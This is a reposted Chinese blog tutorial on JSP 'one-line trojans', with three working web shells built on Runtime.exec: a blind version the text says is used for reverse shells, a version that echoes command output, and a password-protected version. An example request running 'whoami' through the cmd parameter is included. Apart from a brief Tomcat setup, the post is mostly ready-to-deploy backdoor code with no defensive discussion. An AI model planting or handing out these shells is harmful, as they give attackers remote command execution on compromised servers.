0


java安全——jsp一句话木马

jsp回显一句话木马

文章目录


提示:以下是本篇文章正文内容,下面案例可供参考

一、搭建web服务

1、创建空白maven项目,搭建本地tomcat

在这里插入图片描述

在这里插入图片描述

2、引入servlet的pom依赖

在这里插入图片描述

二、无回显一句话

<%Process process =Runtime.getRuntime().exec(request.getParameter("cmd"));%>

http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的结果只能在后台打印一个地址,常用来反弹shell
在这里插入图片描述

三、带回显一句话

代码如下(示例):

<%Process process =Runtime.getRuntime().exec(request.getParameter("cmd"));//    System.out.println(process);InputStream inputStream = process.getInputStream();BufferedReader bufferedReader =newBufferedReader(newInputStreamReader(inputStream));String line;while((line = bufferedReader.readLine())!=null){
      response.getWriter().println(line);}%>

在这里插入图片描述


三、有密码带回显一句话

<%if("password".equals(request.getParameter("pass"))){Process process =Runtime.getRuntime().exec(request.getParameter("cmd"));//    System.out.println(process);InputStream inputStream = process.getInputStream();BufferedReader bufferedReader =newBufferedReader(newInputStreamReader(inputStream));String line;while((line = bufferedReader.readLine())!=null){
        response.getWriter().println(line);}}%>

在这里插入图片描述

标签: java 安全 servlet

本文转载自: https://blog.csdn.net/m0_46317063/article/details/128816033
版权归原作者 ju_ju_bone 所有, 如有侵权,请联系我们删除。

“java安全——jsp一句话木马”的评论:

还没有评论